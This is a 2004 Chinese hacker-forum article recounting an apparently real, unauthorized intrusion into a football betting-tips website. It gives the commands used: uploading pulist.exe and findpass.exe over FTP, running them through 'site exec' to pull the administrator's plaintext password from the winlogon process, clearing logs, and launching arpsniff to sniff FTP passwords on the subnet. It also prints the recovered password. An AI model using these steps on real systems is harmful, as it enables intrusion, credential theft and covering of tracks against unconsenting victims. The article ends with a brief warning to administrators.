 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 一次真实的入侵--记对一足球推荐站点的渗透 | |||||
作者:charley … 文章来源:CnXHacker.Net 点击数: 更新时间:2004-10-24  |
|||||
|
进入C盘 为了防止不能添加用户。我采用偷他密码的方法。(有时候他有密码策略,所以会出现添加用户失败)用FTP传pulist.exe和findpass.exe上去。在本地编辑一个bat文件,内容是 c:\winnt\twain_32\pulist.exe >a.txt 把会显的内容写进A.TXT 在FTP里应该这样 ftp>quote site exec a.bat 下载a.txt看看进程和对应的PID值 winlogon.exe 对应的PID值是1252 然后再编辑a.bat c:\winnt\twain_32\findpass 机器名 管理员名 winlogin.exe的PID值 OK。在下载A。TXT,看到密码了哈哈 To Find Password in the Winlogon process Usage: c:\winnt\twain_32\findpass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 2512 (0x000009d0). To find SUPERRRABBIT\D1haokan123.com.net password in process 2512 ... The encoded password is found at 0x00800800 and has a length of 15. The logon information is: SUPERRRABBIT/administrator/netChina.com123. The hash byte is: 0x2a. 密码是netChina.com123 然后就是用他登陆,了。清理日志。然后传嗅探工具arpsniff.exe winpcap.exe 运行 arpsniff 61.143.251.1 61.143.251.** 21 a.txt 0 开始漫长的等待。 由于还没有嗅到密码我就发文章了。呵呵 现在得上去看看得密码没有 呵呵。 还要多谢 sykkk 是他教我们学会嗅探的。 这里没有什么技术可言,都是一些经验。希望能对一些人有帮助。还有,嗅探这招比较毒,如果在我们学校的机子里有一台被拿下的话。其他的主机也有危险。------------------希望网管们注意这个古老的入侵方法,做好防范。 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| Skype故障报告疑点重重 用户 北京网通“连续上网48小时断 苹果发布QuickTime补丁 一次 黑客攻击每39秒一次 1234为最 互联网39秒发生一次黑客攻击 真实IP带来的安全隐患 贝宝推一次性虚拟支付卡技术 你BT!我更BT!记一次入侵BT Q币 一次虚拟向现实的进攻 一次对顽固灰鸽子的查杀 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
